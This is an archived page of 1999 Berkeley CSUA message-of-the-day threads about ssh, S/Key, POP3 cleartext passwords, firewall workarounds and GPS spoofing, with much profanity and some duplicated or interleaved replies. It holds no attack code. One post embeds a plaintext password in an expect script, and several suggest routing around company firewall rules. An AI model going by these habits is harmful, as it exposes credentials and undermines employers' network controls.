Computer SW Security - Berkeley CSUA MOTD
Berkeley CSUA MOTD:Computer:SW:Security:
Results 1 - 150 of 1108   < 1 2 3 4 5 6 7 8 >
Berkeley CSUA MOTD
 
WIKI | FAQ | Tech FAQ
http://csua.com/feed/
2024/11/23 [General] UID:1000 Activity:popular
11/23   

1999/9/28 [Computer/SW/Security] UID:16610 Activity:high
9/27    Anyone successfully installed ssh on FreeBSD 3.3?
        \_ just copy the binaries straight from soda.
        \_ sh ./configure ; make ; make install ; ssh-keygen ; ssh http://blah.com
           \_ cd /usr/ports/security/ssh; make install; make clean
                \_ it didn't work on my sys.   Something about rsaref not
                        able to compile.  How do I update the ports list?
        \_ use the source luke.
1999/9/20-21 [Computer/SW/Security, Computer/Networking] UID:16556 Activity:high
9/19    What is in.identd (running on port 113 (auth))? man isn't very
        clear on importance of the service.
        \_ T3 = 28xT1
        \_ From identd(8):
           identd is a server which implements  the  TCP/IP  proposed
           identd is a server which implements  the  TCP/IP  proposed
           standard  IDENT  user identification protocol as specified
           in the RFC 1413 document.
           READ THE FUCKING RFC TWINK! --not tom
           READ THE FUCKING RFC TWINK! --not tom
           \_ "READ THE FUCKING RFC.  I'M A FUCKING ASSHOLE."
              Grow up you fucking brat.
        \_ could this be the reason why .shost authentication doesn't work
           if you have this service turned off?
           \_ It's there to buxt the not-so-elite h4ckurz!!!!1
                \_ ssh does not use identd.  Turn it off, it's annoying.  -tom
                   \_ it does if linked against a libwrap.a that does
                      rfc 1413 lookups by default.
              \_ negligible, given that there is a lot more tightly coupled
                 copper wiring in the electrical cords, house wiring, etc.,
                 constant of the insulators.
1999/9/20-21 [Transportation/Car, Computer/SW/Security] UID:16553 Activity:low
9/18    anyone have a car and want a decent cassette deck?
        let me know... - danh
        \_ Boosting car stereos again danh?
        \_ could this be the reason why .shost authentication doesn't work
           if you have this service turned off?
           \_ It's there to buxt the not-so-elite h4ckurz!!!!1
                \_ ssh does not use identd.  Turn it off, it's annoying.  -tom
                   \_ it does if linked against a libwrap.a that does
                      rfc 1413 lookups by default.
1999/9/18-21 [Computer/SW/Security, Computer/SW/Unix] UID:16547 Activity:kinda low 77%like:16544
9/16    How do I pipe to an rsh? Say I want to do
        sort file | rsh machine -l user cat > file.sort
        \_ Exactly like that.  If it doesn't work for you, what error
           message do you get?
        \_ Wanna get rid of 20 lbs of ugly fat real fast?  Go in for a
           decapitation.
        \_ You might want to make sure you can rsh commands first.  I generally
        \_ Use ssh instead of rsh.
           test with something llightweight like 'rsh remotemachine -l
           remoteuser whoami' first.  -ERic
           \_ so your answer is?  Just do plain exercise and hope that the
              fat around your abs goes away?
        \_ s/rsh/ssh/g
        \_
            Assuming you have rsh set up properly do something like
            sort file | rsh machine -l user "cat > file.sort"
            or
            sort file | rsh machine -l user dd of=file.sort
            -ERic
1999/9/18-21 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:16546 Activity:low 61%like:16538
9/16    Thinking about getting a text pager (one where I can forward from
        these pagers and service cost? Thanks.
        \_ Bless you! Lynx with SSL rocks.
        \_ Fat Whacker!
        \_ Exactly like that.  If it doesn't work for you, what error
           message do you get?
        \_ Please rewrite this in English and I will try and answer.
           \_ Me speaky perfect goodly engrish so you fuck my mother!!!
1999/9/15-17 [Computer/SW/Security, Computer/SW/Unix] UID:16526 Activity:moderate
09/15   how would u transfer email addresses from an access database to a
        majordomo listserver every day? - turin (ie: ftp? or something else
        kewl i am missing?)
        \_ how do you automatically upload a file without being prompted
          with username and password via ftp?
          \_ .netrc . I wouldn't recommend it, though. --dim
           \_ pirate. way to go!!
                        \_ The Man is watching.
        \_ scp.
1999/9/15 [Computer/SW/Security] UID:16519 Activity:high
9/13    So once again, does anyone know the side effects of dexadrine?
        - oh and yes, bitch, I am CVSing this motd.
        \_ Whats the point of cvs'ing a single file?  -ERic (who has been
           rcs'ing the motd for months now)
        \_ Whats the point of cvs'ing a single file?  -ERic
           \_ I know what this does (send me porn passwords), but can someone
              give a formal definition of what is going on here?
        \_ is your ADD so bad you can't do a web search for dexadrine and
           side effects?
           \_ I don';t have add you stupid fuckin gmororn.` and if you
              can't understand why I'm taking it then get the fuck out
              of the machine.csua you've been calling your world.
        \_ Everything in here is wrong except the bits about
           "gmororn", "this", and "porn".
1999/9/9 [Computer/SW/Security] UID:16488 Activity:nil
9/9     http://www.rouze.com (came out a bit early)
1999/9/6 [Academia/Berkeley/CSUA, Computer/SW/Security] UID:16471 Activity:nil
9/6     I have lists of student ID numbers I want to verify.  Does Berkeley
        have some kind of service that lets me do this on a regular basis.
        (How does CSUA check SID against names or can someone just fill out
        a fake account form)?
        \_ http://regssl.berkeley.edu --jon
1999/9/3-5 [Computer/SW/Security] UID:16458 Activity:moderate
9/3     They're out there watching you:
        http://www.cnn.com/TECH/computing/9909/03/windows.nsa
        \_ Either MS was trying to please the DOJ to ease itself from the
           antitrust case, or it was simple an unintentional bug.
           \_ UNINTENTIONAL BUG? Jeeez, how stupid are you?
              WHy do you think microsoft "easily" got through various
              crypto regulations, when everyone else is fighting
              nasty battles?
           \_ Hey, fuckhead: don't go selectively erasing replies.
              Particularly, on-topic, and ACCURATE replies.
              To repeat:
              How the hell can it be "unintentional".. you don't
              "accidentally" distribute something with an additional
              key that can unlock everything. It was deliberately
              put in. Anyone with a CLUE would realise this was to
              get NSA/government approval for their crypto API stuff.
              In fact, anyone with a clue would have realized this
              the minute they heard that MS got their crypto API
              'approved' a year ago or whatever. EXPORTABLE.
              This violates ITAR, without a back door!
        \_ see also http://www.cryptonym.com/hottopics/msft-nsa.html
           What I'm wondering is what MSFT gets in return?  Think they cut
           some deal with our buddies in the NSA?
        \_ it's all about th "__NSAKEY" reference
        \_ Read some of the rank 5 posts on /. for clue which you won't find
           here.
1999/9/3 [Computer/SW/Security, Computer/SW/Unix] UID:16456 Activity:high
9/2     Root decided to turn off ~lwall/bin/mail.pl without notice.
        E-mail root and let them know that you are opposed to this change!
        \_ it's a great idea.  shut up, nickkral  -tom
1999/8/30-9/1 [Academia/Berkeley/CSUA/Troll, Computer/SW/Security] UID:16435 Activity:high
8/30    Is there any possibility that politburo will reconsider their policy
        concerning ftp?  Too, we are unable to understand why POP3 access is ok
                        \_ shut up, ikiru
        whereas those of us who have a tough time comprehending s/key ftp
        have to suffer.  Plain text passwds are sent willy nilly via pop are they
        not?
        \_ Before you can begin to expect consistent policy from CSUA
           leadership, you need to exhibit consistent policy with your
           margins in the motd
        \_ The real answer is that since this is all done on a voluntary basis,
           they don't have time to lock down everything at once.  Your gripe
           that you're being unfairly treated while pop folks are somehow
           allowed to continue violating basic security concepts is ill
           conceived.  Expect that in time *all* of the incredibly lame
           services including pop will be either secured or disabled in time.
           services including pop will be either secured or disabled.
           If the csua was run by full time staff getting paid to do so, I'm
           sure this would have happened a long time ago.  kudos to root and
           any of root's elves who helped for putting in the time required and
           biting the bullet from the whiners with zero security clue.
           \_ Mikeh and the rest of root staff rock!
           off POP3 for the foreseeable future (> 1 year).  Turning off POP3
        \_ POP3 is cleartext; there will be no solution other than turning
           off POP3 for the foreseeable future (> 1 year).
        \_ APOP is trivial to implement, and not cleartext.  -tom
           \_ does APOP work with everyone's favorite GUI mail reader, or
              will they be bombarding root@csua with "My Outlook 95 doesn't
              work anymore?  Is e-mail b0rken?"  My assumption was that
              widespread conformance to encrypted POP won't happen in < 1
              year.  In regards to threads below, I eventually foresee
              turning off POP3, turning on APOP, and sending a mass e-mail to
              all CSUA members informing them of this and pine|elm|etc. and
              .forward.
          Turning off POP3
                 \_ no, ED IS!
                    ED! ED! ED IS THE STANDARD! answer
           would piss enough people off of anything I can imagine.  POP3
           cleartext is THE way to sniff pw's.  S/Key and ssh are a)
           steps in the right direction, and b) get the userbase accustomed
           to security annoyances.  The reasoning is suspect, but for me
           it's not something to put up a fight about since I believe I
           understand the pros and cons.  I look forward to non-availability
           of POP3 script-kiddie port sniffers. -non-Politburo sodan
           \_ Tough shit for the whining pop3 masses.  Let them forward their
              mail or read it locally.  I don't want to see soda broken into
              because some pop twits are too lazy to do the right thing.
              \_ then get off YOUR lazy ass and find an alternative.  Oh,
                 and PINE is not the answer.
                 \_ *I* don't have a security problem reading my mail.  If
                    you're one of those whining security clueless pop users,
                    the problem is yours, not mine.  *You* need to find an
                    answer, not me.  Go look at APOP if you simply *must*
                    use soda as your mail server.  I'm not lazy at all.  I
                    already solved this problem for myself years ago, thanks.
                    \_ Then when i crack your account by sniffing your passwd
                       and then bring down the internet with my elite hacking
                       and the blame all falls on you, ! H0P3 U $+!lL (@N Sl33P
                       @ |\|!6H+...
                       \_ D00d, th@t p05t3r uz3z 55H!  U l00z3!
                    \_ ED ED IS THE STANDARD!
                 \_ install unix it will cure cancer and bring you the
                    magical mystical gold at the end of the rainbow
                        \_ No, idiot.  You can't sniff my password.  My pw
                           never goes out in clear text.  You won't be cracking
                           my pw anytime soon.  It's *your* password I don't
                           want cracked.
1999/8/30 [Computer/SW/Security] UID:16428 Activity:high
8/29  Hillary involved in Waco fire deaths!  http://www.drudereport.com/matt.htm
1999/8/28 [Computer/SW/Unix, Computer/SW/Security] UID:16415 Activity:nil
8/27    Can I use ssh port forwarding to FTP to soda?
        What port do I need connect to at soda?
        \_ Yes, but you'll still need to login using S/Key
           \_ if you do it right, you do not need s/key
               \_How do I do it Right?
1999/8/28-30 [Computer/SW/Security] UID:16410 Activity:nil
8/27    Does shost use a callback scheme to authenticate the host? I'm
        having problems doing an shost login through a firewall. Of course,
        I bet all those die hard security people are going to flame me
        for using shost now.
        \_ try an ssh -v.  It may be failing because it's trying to authorize
           the client's host key.  IIRC, to use shosts, at least with the
           config on soda, your client key must be in soda:~/.ssh/known_hosts
        \_ Some firewalls don't pass privileged ports properly.  Try "ssh -P"
2024/11/23 [General] UID:1000 Activity:popular
11/23   

1999/8/26 [Computer/SW/Security] UID:16400 Activity:insanely high
8/25    Can someone finish this off. I'm trying to get rc.local to
        automatically establish a secure tunnel to uclink4 but I can't
        seem to get expect to work.
        ssh -f -lmyusername -L 143:uctwink4:143 uctwink4 _???_
        \_ seems ok to me, but I think it would still require a passwd
                unless you use RSA (-i identity file). But I may be
                wrong, I'm no guru. -chingon
                \_ Where I have a _???_ I had it execute and expect
                   script like
                   #!/usr/local/bin/expect -f

                   expect "password: "
                   send -- "mypassword\r"

                   that didn't seem to work. It still asked me for a password
                \_ you want expect to spawn ssh instead, because it's
                   ssh that's asking you for the password.
                   \_ Then what goes in place of the _???_
                      \_ try "sleep 1800" (which uclink actually ignores
                         but which is correct in general and which makes
                         ssh happy)
1999/8/25-28 [Computer/SW/Security] UID:16394 Activity:nil
8/25    Does the modified s-key telnet login system use ip identification
        to associate user name with challenge offerings? For instance,
        if I login with my user name mispelled, the password: prompt
        appears without offering an s-key challenge. so my question is
        how does skey know when to offer a challenge?
        \_ If there is no account with the name you typed, skey can't be
                set up for that username, so it can't challenge.
        \_ there is so much m, you must rtfm
1999/8/24-26 [Computer/SW/Security] UID:16387 Activity:kinda low
8/24    I don't understand why ftp is s/key enabled but tons of
        folks still pop their mail that is still a big security hole for
        the less competent users of soda I believe
        \_ Wrapped for the good of the people.
           \_ Wrapped with what?  tcpwrappers is useless unless you
              actually enable some rules.
        \_ One step at a time.  Secure POP/IMAP methods are being investigated.
           \_ Step one should be to THINK ABOUT THE ACTUAL AFFECT
                \_ effect.
           \_ I don't know if this is enforceable, but I use an SSH tunnel
              to soda's IMAP server.  That's a possible alternative.
              \_ It's trvially enforceable (just have TCP wrappers only
                 allow connections from localhost.
1999/8/24 [Computer/SW/Security] UID:16385 Activity:nil
8/23    Someone turn off the POP3 port (110) ? More unneeded security
        for the CSUA penitentary?
        \_ No, I think it's just hozed. Try mailing root.
1999/8/19-20 [Computer/SW/Security] UID:16348 Activity:high
8/19    Is it possible to disrupt GPS signal? Can Russians/Chinese send
        a satellite that sends false signal?
        \-well i guess i am now the gps "expert". well, yes, of course
        the system/signal can be disrupted. whether it can be spoofed
        is a trickier question ... because that is a detection-evasion
        issue. the answer depends on what scenario you are looking at.
        there is considered anti-spoofing engineering that has gone into
        the system and the protocol/signal design. if you have a more
        specific question, i may have a more specific answer. --psb
        \_ whatever.  zip your pants back up.
        \_ Not to mention that the signal is encrypted (PPS) and purposefully
           munged (bias in SPS). --dim
                \-the question is about a hostile attack [denial/spoof] which
        is different from an attack on an encryptions system [which is about
        extracting info, not restricting info or false info] so this normal
        mode isnt especially relevant. you seem to be getting at the source of
        errors. there are a huge number of sources of errors, some of them
        mathematical and contrived, other from circumstances [signal quality
        where you are, HDOP, etc.] or from nature [ionospheric delay [also
        measured in L2 channel]]. SPS bias [called SA] is usually about
        100m XY, 150m Z, and 350ns time but this too is varied to limit how
        much refining youc an do by long observations in carrier phase mode.
        on the L2 [secure channel], in addition to the normal encryption
        [P code], there is hardened mode for spoof detection which involves
        re-encrypting the L2 signal into Y code ... you need an even higher
        clearance for Y than PPS. i will now have to kill all of you. --psb
        \_ I was more addressing the "false signal" aspect than the
           "interrupt" aspect. Since the signal is encrypted, it would
           seem it would be difficult to spoof unless the spoofed signal
           used the same encryption algorithm. --dim
                \not necessarily. i am not sure if a "playback attack" would
        work because time is part of the encoding but in theory you could
        record the L2 telementary and just play it back at the wrong time.
        i am not sure what recievers would do with that. again it depends
        how exotic a scenario you want to envision ... i mean if the russian
        can park a mini-black hole next to the SV and slow down the cesium and
        rubidinum clocks on the satellite that would work too. i mean yes
        your answer acknowledges "there is some security in the system". --psb
        \_ A playback attack of this sort is (if it worked) basically a
           denial of service attack. I was more referring to an attack
           that would result in a diabolical signal skewed from the
           original by some known coordinates. It might be possible, but
           not easy to do. I agree that denial of service is the simplest
           way to go, but it's more obvious and less vile. --dim
                \-this is not what is usually considered a DoS. That would be
        more analogous to blocking the signal or some other way of preventing
        satellite lock. that's a spoof attack. --psb
        \_ Semantics. Using a spoof attack to deny service. Depends on
           what the original poster meant by "false signal". Of course,
           now that I think about it, wouldn't the original signal have
           to be jammed in some way first? How would the receivers react
           to multiple signals? --dim
                \-if i spoof a source address and use this to break into your
        machine and i use that to read your resume to find out your home
        address and then come over and cut your fingers off, i wouldnt call
        that a DoS or a spoof attack. what would you call it? nice account
        name. --psb
        \_ Dude, chill out on the coffee. You know what I meant and that's
           why I used the word "basically". --dim
                \-psb      ttyPv   Aug 10 00:38   (coffeehut.lbl.gov)
        \_ So it sounds easy to "disrupt" signal. So how hard can it be for
           Milosevich to send out GPS signals? If he had done it from the
           beginning, then there wouldn't be any cruise missile right?
        \_ Yeah I totally saw this in a movie and like though James Bond was
           like really cool with thise Chinese chick and they like you know
           figured it out and stopped the bad guy and totally were on the
           make so yeah the Russians can probably do it and steal our people
           who are out boating and stuff and make them boat to Russia and be
           held captive while hiking and stuff so like uh huh nuke 'em before
           they take over the GPS because then they could boatjack our navy
           and make these really cool ufos the airforce have get confused and
           land in China or Russia or Iraq!!!!
1999/8/13-15 [Politics/Foreign/Asia/China, Computer/SW/Security] UID:16312 Activity:kinda low
8/13    Anyone seen this?  I wonder if we could determine if it's for real:
        http://www.iacr.org/~iacr/misc/china
        I'm trying to find alternate sources of verification.   -brain
        \_ It's obviously a hoax.  No one is going to hand over $300m in gold
           because someone found a tablet.  It's ridiculous.
        \_ i"ve just decyphered it. The text tells of the location of
           the Ark of the Covenent
        \_ I saw a problem with the date, it says ROC year 1933, but
           there's no ROC year 1933.  Obviously, it's western year
           1933, which is ROC year 22.
           \_ Another problem is that the "Hua" character in "Chung Hua Min
              Kwo" (Republic of China) is in Simplified character which was
              not used in ROC and in present Taiwan.  Simplified character
              is only used by Communist China which was founded in 1949.
              -- yuen
        \_ I have discovered the solution to this problem, but the motd is
           too small to contain it.  -fermat
           \_  umm, okay, really I was asking, "I wonder if there are actual
               gold bars with valid encrypted data on them, and if so, what
               the encrypted message is."  The transaction detailed by the
               story is actually irrelevant, because, as you say, it's a
               sure bet that the account is no longer valid.     -brain
1999/8/6 [Computer/SW/Security, Computer/SW/Unix] UID:16264 Activity:high
8/6     After <DEAD>www.windows2000test.com<DEAD> has gone down 3 times <DEAD>crack.linuxppc.org<DEAD>
        has yet to do so nor has it been cracked.  For any of you intrested,
        the root password is linuxppc. [not any more it aint]
        Give it a shot and win a free computer.
        \_ lemme guess. set up by the same schmuck that put up a target
           at defcon, running OFF A CDROM DRIVE.
           If I wasn't too busy,I'm tempted to nail the damn thing myself.
           But then again, where the hell can I get a "normal" linuxppc
           account to compile stuff?
           \_ on your mac
              \_ Exactly.  How many LinuxPPC users out there?  Also, I
                 was under the impression that the PPC code was not open
                 source.  Is that correct?
                        \_ It can't include Linux kernel sources if it's
                                not "open source" (GPL'ed)
        \_ Gee, my computer might go down too if STRUCK BY LIGHTNING.
           \_ Somebody did a traceroute and found that all of the routes
              up until the machine was still operational.  Microsoft
              claimed that the router failed.  It's summer, the weather's
              good
1999/8/2-3 [Computer/SW/Security] UID:16222 Activity:moderate
8/1     Anyone taken a look at, or know anyone who has taken a look at the
        source for pgp 6.5.1.  For some reason i have more faith in the
        integrity of the older versions. (Just 'cause i'm paranoid doesn't
        mean that they're not out to get me).
        \_ What makes you suspicious of 6.5.1?
           \_ Old Calvary are suspicious of tanks.  It is just because,
              back in the day, i was around paranoid types that i trusted
              who said PGP had been checked and was o.k. That was
              pre pgp_for_windows and pre talk of clipper chips.
        \_ I looked at it.  Did you see the function in there called
           SendKeyAndDataToJanetReno@FBI.GOV???  I was shocked but it's
           really in there!  No kidding!
1999/8/1-2 [Computer/SW/Security, Computer/SW/Unix] UID:16219 Activity:very high
8/1     http://istpub.berkeley.edu:4201/bcc/Sept_Oct99/avc.students.html
        IS&T once again tries to catch up to what student groups have provided
        for the last 10 years, and only manages to see part of the picture.
        (Last time, they decided all students needed was e-mail and we got
         UCLink.  Just imagine how screwed up this new file server will be.)
         \_ soda [21] wc -l /etc/passwd
               2501 /etc/passwd
            Think of how disasterous that would be to provide 30,000
            traditional style login acounts on a single computer (not to
            mention how expensive the hard disk space would be). The fact
            is that most majors don't require a unix shell account but it
            would be nice for the common Berkeley student to have some unix
            experience.  Unfortunately costs and needs don't always coincide.
                \_  Utterly lame!  If i'm making $20+/hr being a paralegal
                    or a doctor I don't have the time or the inclination to
                    fiddle around with unix man pages.  I am more productive
                    using 1. an interface I'm used to (since I'm not a
                    programmer what do I care about software development) and
                    2. an interface that supports applications ALL MY
                    COLLEGUES IN _MY_ (not YOUR) FIELD USE.  I'd rather spend
                    my time ski-ing or outdoors than fiddling around with
                    .conf files.
                    \_ That's funny.  I have time to do my regular school
                       work, fiddle with .conf files, read the fucking man
                       pages, and go skiing.  And unix is VERY useful for
                       people not in the CS major.  Go ask the people at
                       LBL what they use for physics simulations.
                       \_ dear God, is the bigotry so deep within you that you
                          fail to see the point?  The point is that I AM NOT
                          YOU.  I DO NOT WANT TO BE LIKE YOU.  What if i
                          said I was a pre med student who spend time commuting
                          to various hospitals in the area?  That's more than
                          just regular school work.  Tell me, is unix helpful
                          in my anatomy class?  Is it useful for LabView?
                          is it useful in my philosophy class?  Is it useful
                          when I call my girlfriend up and see what time she'd
                          be ready to go see the opera?
                          Climb out of your cubicle, man.
                        \_ idiocy deleted.
                        \_ fascist nazi.  What gives you the right to delete
                           people's opinions at your whim?  What's next after
                           your ssh tactics?  rm -rf people you don't like?
                    my time with my friends or girlfriend than fiddling around
                    with .conf files. - Publius
                   \_ uh, so why do you care if people who are *not* idiots
                      have Unix shell access?  You can diddle around with
                      Netscape all you want, regardless.  -tom
                    \_ It's about the oppurtunity to do what you want.
                \_ Why use a single computer?  The OCF provided 12,000+ login
                        accounts 5 years ago on a cluster of 1989-era machines
                        (Motorola 68030 & 040 based apollos).  As for disk
                        space, that's what IS&T is proposing to do.
                \_ providing shell access to uclink4, for example, would
                   lower CPU usage (POP is very expensive) and support costs.
                   The support cost argument is bullshit; if you look at
                   the total cost picture, having shell access is much
                   cheaper.  What IST means when they say "it costs less"
                   is "it costs US less". -tom
                   \_ IS&T has a history of ignoring reality, tom.   you
                      should know that.
                   \_ Support costs go up when idiots start wanting to use
                      shells.
                \_ I would say, rather, that they ignore campus concerns in
                   favor of doing things which are convenient for them.  -tom
        \_ They should buy a NetApp.
           \_ NetApp's suck. EMC, dude.
        \_ lets take this to http://ucb.computing.announce (ucb.computing.discussion
           would be better but there is no such group ... yet) --jon
           \_ hence, mail root@agate
              \_ hence the "... yet" --jon
           \_ Okay, now lets take this to http://ucb.computing.discussion --jon
1999/7/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16207 Activity:moderate
7/29    I have a friend.  Or rather, I had a friend.  I very recently
        killed him.  My friend believed he could safely install linux
        on a partition on my win95 machine while I slept.  The long and
        short of the story is that he couldn't, and I now have no DOS
        partitions.  I don't think any of the data was screwed up, but the
        partitions aren't there anymore.  Could someone recommend a
        utility or two to try to recover some files?  -mjm
        \_ need more info about your current state.  does linux boot up?
           if it does you can recover much of the fat32 partition and place
           it on some storage medium.  try running fips and see what the
           partitioning tables look like
        \_ where did you bury the corpse?
            \_ Linux boots up.  The partition table is all jacked.  (It's
               got the part's that linux created, but there nothing like
                what the original were.)  I've got FAT16, if that matters.
                I do kinda remember what the partition sizes were.
                \_ by, the way, it would probably better if you run
                   /sbin/fdisk and type p to print out the partition table
                   and post the results on the motd.  --jeff
                \_ If you would like to backup your dos partition here's
                   what you do.  In the /etc/fstab file and add the entry
                   /dev/hda1    /mnt/dos        vfat defaults   0 0
                   or something like that.  the first field is the device
                   that your dos partition is on and /mnt/dos is the directory
                   that you want to mount your dos partition.  then issue
                   the command "mount /dev/hda1" and you can access your dos
                   partition in /mnt/dos.  How you get that drived backed
                   up is another story.  Too complicated?
                   Try going into your /etc/lilo.conf file.  If you're using
                   RedHat you might have an entry like

                   other=/dev/hda1
                        label=dos
                        table=/dev/hda

                   If there isn't one add it and run /sbin/lilo.  Of course
                   make sure that /dev/hda1 is where your dos partition is.
                   Reboot your computer and at the LILO: prompt type "dos"
                   and it should boot up into Windows.  Deleting the linux

        \_ Your friend did you a big favor. Its about time you accepted that
           Win95 is obsolete and started using the best technology that is
           available: Linux 2.2.x. Don't recover your DOS partitions, forget
           about the dark side and start living in the future of computing.
                   partition (I'm not sure why you want to do that) is a
                   matter of running fips or partition magic and running
                   fdisk /MBR at the dos prompt.  Hope that helps.  --jeff
1999/7/23 [Computer/SW/Security] UID:16187 Activity:low
7/22    Regarding s/key -- is it at all useful to set it up if
        I regularly use ssh to login?  And if I do set it up, will
        I have to use the s/key passwords when I log in via ssh?
        \_maybe.  will you always have ssh available?  setting up skey
                only affects telnet and ftp, not ssh.
                \_ yes, you'll need S/Key for ftp
        \_s/key is a good thing for if you don't have accesst to ssh, or
          for some reason like plaintext, one-time, passwords and plaintext
          transmission of your session better than a fixed password and an
          encrypted session.  It helps to read the info you can find on the
          web about the two different technologies.  But no, you don't have
          to use both.
1999/7/22-23 [Computer/SW/Security] UID:16185 Activity:moderate
7/22    If someone didn't set up s/key (i.e. keyinit) before the 15th,
        and now doesn't have access to ssh, is there any way he can set
        up s/key?
        \_ log into a machine that has ssh, and ssh into soda.
           \_ What part of "doesn't have access to ssh" didn't you
              understand?
        \_ does "someone" have access to a Java-capable browser?
           Use http://www.csua.berkeley.edu/ssh
           \_ Read the question again.  I didn't ask for generating
              OTP's.  I asked about what to do if 'keyinit' wasn't run
              before July 15.  Someone like this logs in and does not
              get an s/key challenge.  Oh yes, and *someone* really is
              someone other than me.  Moron.
              [my rude answer deleted.  sorry.]
              \_ The answer has nothing to do with generating OTPs.  As
                 the official motd says, a java ssh client is available
                 at <DEAD>...edu/ssh<DEAD>  Try not to be such a fucking jerk the
                 next time someone tries to post a helpful motd answer --pld
                 \_ Sorry.  I totally blew it reading the answer.  My
                    apologies to whomever gave the answer that I so
                    stupidly ignored.
              \_ Huh?  I don't know about s/key and I've never ran "keyinit"
                 or anything like that.  I just downloaded an SSH client and
                 now I can log in fine.  -- yuen
              \_ Exactly. I've basically ignored all this S/Key stuff. You
                 don't *need* it to log in. Or have you ever tried logging
                 in withOUT whatever this s/key thing is?
1999/7/22-23 [Computer/SW/Unix, Computer/SW/Security] UID:16184 Activity:nil
7/22    How do you log off those people how are still using a telnet session
        since the pre-ssh enforcement period?
        \_ The ban is on cleartext passwords.  Using telnet is fine.
1999/7/22-23 [Computer/SW/Security] UID:16181 Activity:nil
7/22    How do you prolong your ssh session such that the server doesn't
        automatically log you out? --converted ssh user
     /_ dont use keepalives, fixk  your firewall, dont uses tcsh autologout
1999/7/20 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16165 Activity:moderate
7/19    More NT security hole:
        http://support.microsoft.com/support/kb/articles/Q221/9/91.ASP
        \_ Why do you folks keep posting old MS holes?  Subscribe to the
           MS security bulletin service and ntbugtraq and be done with it.
           \_ B3CUZ L1NUX 1Z TH3 P3RF3CKT 0S W1TH AB0LUT3L3 N0 S3KUR1TY
              H0L3S AT ALL, D00D!!1!!  TH1Z PRUV3S 1T!!1!!!
        \_ Also http://support.microsoft.com/support/kb/articles/Q234/5/57.ASP
1999/7/16 [Computer/SW/Security, Academia/Berkeley/CSUA/Motd] UID:16144 Activity:moderate
07/15   I don't get s/key... isn't soda supposed to issue an s/key
        challenge when I ftp into soda?
        \_ You must be this tall to use skey
        \_ You have to set up your key first.  see man skey(1)
                \_ http://soda.CSUA.Berkeley.EDU% man skey(1)
                   Badly placed ()'s.
                   \_ You must be this tall to use man
                   \_ "skey(1)" means to type "man 1 skey" -- it looks up skey
                      in manual section 1 (user commands).  The section number
                      is optional, but it matters if there are two manpages
                      with the same name -- for example, printf(1) tells you
                      about the "printf" command-line utility, but printf(3)
                      tells you about the C library function.
                        \_ SONOFABITCH!! I can't believe someone actaully posted
                           a usefull and non-insulting reply!! Surely the motd
                           gods will banish you for eternity! You asked for it!
                   \_ man skey
1999/7/15-16 [Computer/SW/Security, Computer/SW/Unix] UID:16138 Activity:high
7/14    S/Key is neat-o.  It works even if you don't have ssh.
        \_ S/Key is useful, but understand that it only protects your _soda_
           password.  If you connect to soda using telnet and s/key, then
           telnet somewhere else and type your ordinary password for that place,
           it can be sniffed.  ssh is not an annoying frivolity, it is a good
           thing; use it if you can.  --dbushong
        \_ Question (not necessarily rhetorical)- Is giving your password to a
           web-based java applet really an improvement over telnet?
                \_ Yes, because your password is encrypted before leaving the
                    machine.  (Of course, the csua should put it on an ssl
                    httpd for the truly paranoid.)
           Yeah, yeah, Java is secure, but aren't there ways around that
           too?
           \_ so download the applet, and install it on your own server.
              Then worse case, it could only communicate back to THAT
              server. And/or just set your security settings to disallow
              applets from making ANY net connections.
              \_ So wouldn't it be nice to have an authorized s/key
                 applet on soda?
                 \_ http://www.csua.berkeley.edu/skey
1999/7/14-16 [Computer/SW/Security] UID:16133 Activity:high
7/14    For people whose firewalls allow telnet but not ssh, I set up scotch
        to redirect telnet and rlogin (ports 23 and 513) to soda's sshd.
        You should now be able to run "ssh -p23 http://scotch.csua.berkeley.edu"
        and log in to soda.  Thanks to alanc for suggesting this.  --mconst
        \_ My firewall runs telnet proxy.  I couldn't ssh before, but
           this works brilliantly.  Thanks, guys!  -John
        \_ note that this wont work if your firewall requires use of a
           proxified program to get through the firewall (like say telnet
           linked against the socks library)
           \_ You can run ssh through socks: use "./configure --with-socks"
              when you build ssh.  Note that most socks servers will let you
              connect directly to soda port 22.  If yours doesn't, you should
              still be able to use the telnet redirector on scotch.  --mconst
           \_ runsocks ssh then
           \_ note this is not intended as the solution to all ssh/firewall
                problems, just one set of them
        \_ mconst and alanc, that was a rad solution to the ssh problem!
           You guys RULE!  -ax
           \_ hey, i was the one who came up with having sshd listen to
              port 23.  i just didn't sign my name on the motd since i
                   The fact that they implemented it on Scotch ahead of
                   the switchover is what makes them rule.  -ax
              didn't know how it would be recieved among nit-picky admins.
                \_ I had that idea too.  It's logical conclusion to reach.
                   The fact that they implemented it on Scotch ahed of
                   the switchover is what makes them rule.  -axa
                \_ I got credit simply because I MAILED ROOT with the
                   sugesstion.  If you want to get people's attention,
                   direct e-mail beats anonymous MOTD posts any day. -alan-
                   \_ maybe i'll sign my motd posts with a pgp signature
                      next time. :-)
           \_ Yeah!  mconst for President!  mconst and alanc 2000!
1999/7/14-16 [Computer/SW/Security] UID:16131 Activity:moderate
7/14    When trying to connect to CSUA with F-Secure SSH 2.0.12 build 9 I'm
        getting the error "Disconnected;protocol version not supported."
        Anyone else get this, any ideas?
        \_ you're probably using the wrong protocol.  make sure you're using
           the right ssh protocols.
           \_ I don't get it.  Isn't CSUA an entirely non-profit
              organization for educational purpose?  Why can't we use ssh2?
              \_ People won't be able to connect from work.
           \_ ssh2 is supposed to be backwards compatible. use the -v flag
              next time and post the output.
              \_ ssh2 is not backwards compatible.  You will need to use an
                 ssh1 client to connect to soda; we can't run the ssh2 server
                 because it has a restrictive license.
           \_ Tried http://csua.berkeley.edu -v and receive the error "No address
              associate with the name"  I do not see a place to change the
              protocols in F-Secure.
                \_ ssh2 is definitely not backwards compatible.  -tom
              \_ You need F-Secure SSH version 1.something.
              \_ And remember, tomorrow you won't be able to post this!
                 Have fun!
                 \_ S/Key works just fine.  It's a pain in the ass logging
                    in, but it requires nothing mroe than telnet.
1999/7/14-16 [Computer/SW/Security] UID:16130 Activity:high
7/14    My company firewall doesn't allow port 22 connection.  What should
        I do?  And getting my ignorant IS management people to open this port
        is probably harder than sleeping with their wives.  Is there an
        alternative way to ssh to soda?
        \_ If you find a port that your firewall allows, let us know and
           we can probably set up an extra sshd on that port.   --mconst
        \_ Try the port redirector I just installed on scotch (look three
           motd entries up).    --mconst
           \_ Thanks.  It works.
        \_ I find it very easy to sleep with IS management's wives.
           \_ Everyone who isn't an IS manager does.
